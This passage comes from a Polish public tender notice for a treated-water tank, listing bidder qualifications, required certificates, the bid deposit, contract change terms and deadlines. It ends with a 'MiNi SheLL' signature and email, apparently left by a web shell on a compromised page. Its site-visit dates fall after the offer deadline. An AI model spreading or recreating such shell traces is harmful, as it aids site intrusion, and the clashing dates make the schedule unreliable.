2 (z uwzględnieniem art. 104) ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. z 2020 r., poz. 1333 z późniejszymi zmianami) lub inne ważne uprawnienia do kierowania robotami budowlanymi bez ograniczeń w tej specjalności, wydane na podstawie wcześniej obowiązujących przepisów. Osoba ta musi wykazać się nadzorowaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, na co najmniej 1 prawidłowo zakończoną i oddaną do eksploatacji robotą budowlaną polegającą na budowie co najmniej 1 żelbetowego zbiornika o pojemności min. 1.000 m3 wraz z pracami branży elektrycznej i AKPiA.<br/>4.2.	posiadają niezbędną wiedzę i doświadczenie, tzn.: <br/>a)	w okresie ostatnich 5 lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – wykonali co najmniej dwa zamówienia (dwa kontrakty) polegające na budowie żelbetowego zbiornika wody uzdatnionej o pojemności min. 2.400 m3 każda, wraz z niezbędnym oprzyrządowaniem, podłączeniem do układu technologicznego, pracami branży elektrycznej i AKPiA oraz wykonaniem wewnętrznych powłok zabezpieczających beton <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">8.	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu Zamawiający żąda następujących dokumentów:<br/>1)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat, wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>2)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>3)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>4)	oświadczenia wykonawcy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – w celu weryfikacji przynależności wykonawcy do grupy kapitałowej (§ 2 ust. 1 pkt 2 rozporządzenia);</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">7.	W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający żąda następujących dokumentów:<br/>1)	dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na co najmniej sumę gwarancyjną w wysokości 2.000.000,00 zł. (słownie: dwa miliony złotych 00/100),<br/>2)	informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości co najmniej 2.0000.000,00 zł. (słownie: dwa miliony złotych 00/100), wystawiona w okresie nie wcześniejszym niż 3 miesiące przed upływem terminu składania ofert,<br/>3)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty,<br/>4)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokument potwierdzający odbycie wizji lokalnej <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść wadium w wysokości: 60.000,00 zł (słownie: sześćdziesiąt tysięcy złotych 00/100).<br/>2.	Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 97 ust. 7 ustawy PZP:<br/>-	pieniądzu,<br/>-	gwarancjach bankowych,<br/>-	gwarancjach ubezpieczeniowych,<br/>-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.<br/>4.	Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego: Bank Spółdzielczy o/Pleszew Nr 69 8407 0003 0007 3147 2000 0002. Wniesienie wadium w pieniądzu za pomocą przelewu bankowego, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy kwota wadium znajdzie się na koncie Zamawiającego przed upływem terminu składania ofert.<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>6.	Zamawiający zwróci wadium zgodnie z art. 98 ust. 1-5 ustawy PZP.<br/>7.	Zamawiający zatrzymuje wadium w sytuacjach określonych w art. 98 ust. 6 ustawy PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień umownych może nastąpić wyłącznie za zgodą obu stron, wyrażoną na piśmie w formie aneksu do umowy pod rygorem nieważności<br/>2.	Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku wystąpienia, co najmniej jednej z okoliczności przedstawionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:<br/>1)	zmiany sposobu spełnienia świadczenia (roboty zamienne) :<br/>a)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych /technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami;<br/>b)	konieczność wprowadzenia przez Zamawiającego zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych;<br/>c)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa;<br/>d)	konieczność zmiany materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, w sytuacji:<br/>- ich niedostępności na rynku spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów bądź urządzeń;<br/>- powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwację wykonanego przedmiotu umowy;<br/>- powodujące poprawienie parametrów technicznych;<br/>- wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Wykonawca składa ofertę za pośrednictwem „Formularza ofertowego” dostępnego na Platformie eZamówienia pobierając, wypełniając i podpisując elektronicznie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-30 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-30</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 2) zmiany ceny umowy:<br/>a) będące wynikiem rozliczenia robót zgodnie z § 4 ust. 5 umowy;<br/>b) z powodu ustawowej zmiany stawki podatku VAT – o kwotę wynikającą ze zmienionych stawek podatku VAT obowiązujących w dacie powstania obowiązku podatkowego;<br/>3) zmiana albo rezygnacja z podwykonawcy dotycząca podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy, w celu wykazania spełniania warunków udziału w postępowaniu, że Wykonawca wykaże Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia;<br/>4) zmiany terminów realizacji przedmiotu umowy - terminy te mogą ulec przedłużeniu w przypadku wystąpienia okoliczności niezależnych od Wykonawcy, skutkujących niemożnością dotrzymania terminu określonego w umowie ze względu na:<br/>a) nie wykonanie w terminie zadania Budowa Centralnej Stacji Wodociągowej,<br/>b) działanie siły wyższej rozumianej jako zdarzenie zewnętrzne, niemożliwe do przewidzenia i niemożliwe do zapobieżenia (np. wojna, atak terrorystyczny, pożar, powódź, epidemie, trzęsienie ziemi, strajki itp.);<br/>c) przestoje i opóźnienia zawinione przez Zamawiającego, zawieszenie wykonywania robót przez Zamawiającego lub wprowadzenie przez Zamawiającego innych Wykonawców;<br/>d) konieczność wprowadzenia zmian w dokumentacji projektowej bądź specyfikacji technicznej wykonania i odbioru robót budowlanych;<br/>e) działania organów administracji państwowej lub samorządowej:<br/>- przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp.,<br/>- odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej dostarczonej przez Zamawiającego;<br/>f) okoliczności niezależne zarówno od Zamawiającego, jak i od Wykonawcy, tj. wystąpi konieczność przesunięcia terminu przekazania placu budowy lub ograniczenia w jego użytkowaniu, udzielenia zamówień na roboty dodatkowe, których wykonanie wpływa na zmianę terminu wykonania zamówienia podstawowego;<br/>- w okolicznościach, o których mowa powyżej, termin wykonania zamówienia zostanie przedłużony o czas, jaki wynika z zaistniałej sytuacji<br/>5) Rozpoczęcie wykonywania „dodatkowych robót budowlanych” wykraczających poza przedmiot niniejszej umowy, a więc robót o których mowa w niniejszym paragrafie, może nastąpić po podpisaniu przez Strony umowy aneksu zmieniającego umowę w tym zakresie. Podstawą do podpisania aneksu będzie protokół konieczności potwierdzony przez Inspektora Nadzoru / Inwestora Zastępczego i zatwierdzony przez Strony umowy. Protokół ten musi zawierać uzasadnienie wskazujące, że spełnione zostały przesłanki, o których mowa w art. 454 - 455 ustawy. Rozpoczęcie wykonywania tych robót musi być poprzedzone wykonaniem dokumentacji projektowej opisującej te roboty. Dokumentacja musi być zgodna z przepisami Prawa budowlanego wraz z jego aktami wykonawczymi.<br/>6) Termin zakończenia realizacji przedmiotu umowy może ulec zmianie, gdy Zamawiający lub zarządca drogi wstrzyma wykonywanie prac o czas czasu trwania wstrzymania prac.<br/><br/>Zamawiający wymaga odbycia obligatoryjnej wizji lokalnej (art. 281 ust. 2, pkt. 12 ustawy). Zamawiający po wcześniejszym ustaleniu umożliwia obejrzenia terenu budowy zbiornika wody uzdatnionej nr 3 – kwestie logistyczne, podłączenia, zapoznanie się z obszarem kolizji z istniejącym rurociągiem DN 300 itp. Wizja lokalna winna odbyć się od 22 do 23 maja 2025 r. w godzinach 8:00 – 14:00, po wcześniejszym ustaleniu z Zamawiającym terminu i godziny odbycia wizji lokalnej (platforma e-zamówienia, e-mail: przetargi@pkpleszew.pl).

Creat By MiNi SheLL
Email: jattceo@gmail.com